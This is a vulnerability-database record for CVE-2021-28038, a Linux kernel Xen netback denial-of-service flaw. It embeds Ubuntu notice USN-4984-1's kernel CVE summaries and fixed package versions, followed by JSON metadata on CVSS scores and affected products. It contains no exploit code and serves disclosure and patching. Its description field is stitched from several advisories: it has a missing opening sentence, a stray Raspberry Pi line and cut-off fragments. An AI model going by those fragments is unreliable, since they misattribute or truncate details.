linux, linux-aws, linux-azure, linux-gcp, linux-hwe-5.8, linux-kvm, linux-oracle vulnerabilities ==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.10
  • Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel. An attacker in a guest VM could possibly use this to cause a denial of service (host domain crash). (CVE-2021-28038)

It was discovered that the Realtek RTL8188EU Wireless device driver in the Linux kernel did not properly validate ssid lengths in some situations. An attacker could use this to cause a denial of service (system crash). A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2021-28688)

It was discovered that the fuse user space file system implementation in the Linux kernel did not properly handle bad inodes in some situations. A local attacker could possibly use this to cause a denial of service. (CVE-2021-28950)

John Stultz discovered that the audio driver for Qualcomm SDM845 systems in the Linux kernel did not properly validate port ID numbers. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28952)

Zygo Blaxell discovered that the btrfs file system implementation in the Linux kernel contained a race condition during certain cloning operations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2021-28964)

Vince Weaver discovered that the perf subsystem in the Linux kernel did not properly handle certain PEBS records properly for some Intel Haswell processors. A local attacker could use this to cause a denial of service (system crash). (CVE-2021-28971)

It was discovered that the RPA PCI Hotplug driver implementation in the Linux kernel did not properly handle device name writes via sysfs, leading to a buffer overflow. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28972)

It was discovered that the Qualcomm IPC router implementation in the Linux kernel did not properly initialize memory passed to user space. A local attacker could use this to expose sensitive information (kernel memory). A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2021-30002)

Dan Carpenter discovered that the block device manager (dm) implementation in the Linux kernel contained a buffer overflow in the ioctl for listing devices. A privileged local attacker could use this to cause a denial of service (system crash). (CVE-2021-31916)

It was discovered that the CIPSO implementation in the Linux kernel did not properly perform reference counting in some situations, leading to use- after-free vulnerabilities. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33033)

马哲宇 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3483)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.10: linux-image-5.8.0-1028-kvm 5.8.0-1028.30 linux-image-5.8.0-1031-oracle 5.8.0-1031.32 linux-image-5.8.0-1032-gcp 5.8.0-1032.34 linux-image-5.8.0-1033-azure 5.8.0-1033.35 linux-image-5.8.0-1035-aws 5.8.0-1035.37 linux-image-5.8.0-55-generic 5.8.0-55.62 linux-image-5.8.0-55-generic-64k 5.8.0-55.62 linux-image-5.8.0-55-generic-lpae 5.8.0-55.62 linux-image-5.8.0-55-lowlatency 5.8.0-55.62 linux-image-aws 5.8.0.1035.37 linux-image-azure 5.8.0.1033.33 linux-image-gcp 5.8.0.1032.32 linux-image-generic 5.8.0.55.60 linux-image-generic-64k 5.8.0.55.60 linux-image-generic-lpae 5.8.0.55.60 linux-image-gke 5.8.0.1032.32 linux-image-kvm 5.8.0.1028.30 linux-image-lowlatency 5.8.0.55.60 linux-image-oracle 5.8.0.1031.30 linux-image-virtual 5.8.0.55.60

Ubuntu 20.04 LTS: linux-image-5.8.0-55-generic 5.8.0-55.62~20.04.1 linux-image-5.8.0-55-generic-64k 5.8.0-55.62~20.04.1 linux-image-5.8.0-55-generic-lpae 5.8.0-55.62~20.04.1 linux-image-5.8.0-55-lowlatency 5.8.0-55.62~20.04.1 linux-image-generic-64k-hwe-20.04 5.8.0.55.62~20.04.39 linux-image-generic-hwe-20.04 5.8.0.55.62~20.04.39 linux-image-generic-lpae-hwe-20.04 5.8.0.55.62~20.04.39 linux-image-lowlatency-hwe-20.04 5.8.0.55.62~20.04.39 linux-image-virtual-hwe-20.04 5.8.0.55.62~20.04.39

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-4984-1 CVE-2021-28038, CVE-2021-28660, CVE-2021-28688, CVE-2021-28950, CVE-2021-28952, CVE-2021-28964, CVE-2021-28971, CVE-2021-28972, CVE-2021-29647, CVE-2021-30002, CVE-2021-31916, CVE-2021-33033, CVE-2021-3483

Package Information: https://launchpad.net/ubuntu/+source/linux/5.8.0-55.62 https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1035.37 https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1033.35 https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1032.34 https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1028.30 https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1031.32 https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-55.62~20.04.1

. (CVE-2017-16644)

It was discovered that the timer stats implementation in the Linux kernel allowed the discovery of a real PID value while inside a PID namespace. (CVE-2021-20261)

Olivier Benjamin, Norbert Manthey, Martin Mazein, and Jan H

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202103-1029",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.260"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.103"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.260"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.224"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.21"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.179"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15.0"
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "xen",
        "scope": null,
        "trust": 0.8,
        "vendor": "xen \u30d7\u30ed\u30b8\u30a7\u30af\u30c8",
        "version": null
      },
      {
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003871"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28038"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.12:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.12:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.260",
                "versionStartIncluding": "4.5.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.224",
                "versionStartIncluding": "4.10.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.179",
                "versionStartIncluding": "4.15.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.103",
                "versionStartIncluding": "4.20.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.21",
                "versionStartIncluding": "5.10.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.11.4",
                "versionStartIncluding": "5.11.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.260",
                "versionStartIncluding": "2.6.39",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28038"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "db": "PACKETSTORM",
        "id": "162542"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-474"
      }
    ],
    "trust": 1.2
  },
  "cve": "CVE-2021-28038",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 4.9,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-28038",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "VHN-387389",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.0,
            "impactScore": 4.0,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 6.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-28038",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "Low",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-28038",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202103-474",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-387389",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387389"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003871"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-474"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28038"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in the Linux kernel through 5.11.3, as used with Xen PV. A certain part of the netback driver lacks necessary treatment of errors such as failed memory allocations (as a result of changes to the handling of grant mapping errors). A host OS denial of service may occur during misbehavior of a networking frontend driver. NOTE: this issue exists because of an incomplete fix for CVE-2021-26931. This update provides the corresponding\nLinux kernel updates targeted specifically for Raspberry Pi devices\nin those same Ubuntu Releases. ==========================================================================\nUbuntu Security Notice USN-4984-1\nJune 04, 2021\n\nlinux, linux-aws, linux-azure, linux-gcp, linux-hwe-5.8, linux-kvm,\nlinux-oracle vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.10\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. An\nattacker in a guest VM could possibly use this to cause a denial of service\n(host domain crash). (CVE-2021-28038)\n\nIt was discovered that the Realtek RTL8188EU Wireless device driver in the\nLinux kernel did not properly validate ssid lengths in some situations. An\nattacker could use this to cause a denial of service (system crash). A local\nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2021-28688)\n\nIt was discovered that the fuse user space file system implementation in\nthe Linux kernel did not properly handle bad inodes in some situations. A\nlocal attacker could possibly use this to cause a denial of service. \n(CVE-2021-28950)\n\nJohn Stultz discovered that the audio driver for Qualcomm SDM845 systems in\nthe Linux kernel did not properly validate port ID numbers. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-28952)\n\nZygo Blaxell discovered that the btrfs file system implementation in the\nLinux kernel contained a race condition during certain cloning operations. \nA local attacker could possibly use this to cause a denial of service\n(system crash). (CVE-2021-28964)\n\nVince Weaver discovered that the perf subsystem in the Linux kernel did not\nproperly handle certain PEBS records properly for some Intel Haswell\nprocessors. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2021-28971)\n\nIt was discovered that the RPA PCI Hotplug driver implementation in the\nLinux kernel did not properly handle device name writes via sysfs, leading\nto a buffer overflow. A privileged attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2021-28972)\n\nIt was discovered that the Qualcomm IPC router implementation in the Linux\nkernel did not properly initialize memory passed to user space. A local\nattacker could use this to expose sensitive information (kernel memory). A local attacker\ncould use this to cause a denial of service (memory exhaustion). \n(CVE-2021-30002)\n\nDan Carpenter discovered that the block device manager (dm) implementation\nin the Linux kernel contained a buffer overflow in the ioctl for listing\ndevices. A privileged local attacker could use this to cause a denial of\nservice (system crash). (CVE-2021-31916)\n\nIt was discovered that the CIPSO implementation in the Linux kernel did not\nproperly perform reference counting in some situations, leading to use-\nafter-free vulnerabilities. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33033)\n\n\u9a6c\u54f2\u5b87 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in\nthe Linux kernel did not properly perform reference counting in some\nsituations, leading to a use-after-free vulnerability. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-3483)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.10:\n  linux-image-5.8.0-1028-kvm      5.8.0-1028.30\n  linux-image-5.8.0-1031-oracle   5.8.0-1031.32\n  linux-image-5.8.0-1032-gcp      5.8.0-1032.34\n  linux-image-5.8.0-1033-azure    5.8.0-1033.35\n  linux-image-5.8.0-1035-aws      5.8.0-1035.37\n  linux-image-5.8.0-55-generic    5.8.0-55.62\n  linux-image-5.8.0-55-generic-64k  5.8.0-55.62\n  linux-image-5.8.0-55-generic-lpae  5.8.0-55.62\n  linux-image-5.8.0-55-lowlatency  5.8.0-55.62\n  linux-image-aws                 5.8.0.1035.37\n  linux-image-azure               5.8.0.1033.33\n  linux-image-gcp                 5.8.0.1032.32\n  linux-image-generic             5.8.0.55.60\n  linux-image-generic-64k         5.8.0.55.60\n  linux-image-generic-lpae        5.8.0.55.60\n  linux-image-gke                 5.8.0.1032.32\n  linux-image-kvm                 5.8.0.1028.30\n  linux-image-lowlatency          5.8.0.55.60\n  linux-image-oracle              5.8.0.1031.30\n  linux-image-virtual             5.8.0.55.60\n\nUbuntu 20.04 LTS:\n  linux-image-5.8.0-55-generic    5.8.0-55.62~20.04.1\n  linux-image-5.8.0-55-generic-64k  5.8.0-55.62~20.04.1\n  linux-image-5.8.0-55-generic-lpae  5.8.0-55.62~20.04.1\n  linux-image-5.8.0-55-lowlatency  5.8.0-55.62~20.04.1\n  linux-image-generic-64k-hwe-20.04  5.8.0.55.62~20.04.39\n  linux-image-generic-hwe-20.04   5.8.0.55.62~20.04.39\n  linux-image-generic-lpae-hwe-20.04  5.8.0.55.62~20.04.39\n  linux-image-lowlatency-hwe-20.04  5.8.0.55.62~20.04.39\n  linux-image-virtual-hwe-20.04   5.8.0.55.62~20.04.39\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-4984-1\n  CVE-2021-28038, CVE-2021-28660, CVE-2021-28688, CVE-2021-28950,\n  CVE-2021-28952, CVE-2021-28964, CVE-2021-28971, CVE-2021-28972,\n  CVE-2021-29647, CVE-2021-30002, CVE-2021-31916, CVE-2021-33033,\n  CVE-2021-3483\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux/5.8.0-55.62\n  https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1035.37\n  https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1033.35\n  https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1032.34\n  https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1028.30\n  https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1031.32\n  https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-55.62~20.04.1\n\n. \n(CVE-2017-16644)\n\nIt was discovered that the timer stats implementation in the Linux kernel\nallowed the discovery of a real PID value while inside a PID namespace. (CVE-2021-20261)\n\nOlivier Benjamin, Norbert Manthey, Martin Mazein, and Jan H",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28038"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003871"
      },
      {
        "db": "VULHUB",
        "id": "VHN-387389"
      },
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "db": "PACKETSTORM",
        "id": "162542"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-28038",
        "trust": 3.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/03/05/1",
        "trust": 2.5
      },
      {
        "db": "PACKETSTORM",
        "id": "162163",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162981",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162695",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162541",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003871",
        "trust": 0.8
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2136",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1089",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1101",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1624",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1669",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1307",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1964",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1694",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1766",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1228",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1655",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0837",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1299",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-474",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162167",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162542",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-387389",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387389"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003871"
      },
      {
        "db": "PACKETSTORM",
        "id": "162167"
      },
      {
        "db": "PACKETSTORM",
        "id": "162695"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "db": "PACKETSTORM",
        "id": "162542"
      },
      {
        "db": "PACKETSTORM",
        "id": "162541"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-474"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28038"
      }
    ]
  },
  "id": "VAR-202103-1029",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387389"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-03-25T22:16:57.992000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux\u00a0Kernel\u00a0Archives Xen\u00a0 project Xen\u00a0Security\u00a0Advisory",
        "trust": 0.8,
        "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00010.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003871"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-770",
        "trust": 1.1
      },
      {
        "problemtype": "Allocation of resources without limits or throttling (CWE-770) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387389"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-003871"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28038"
      }
    ]
  },
  "references": {
    "@context": {
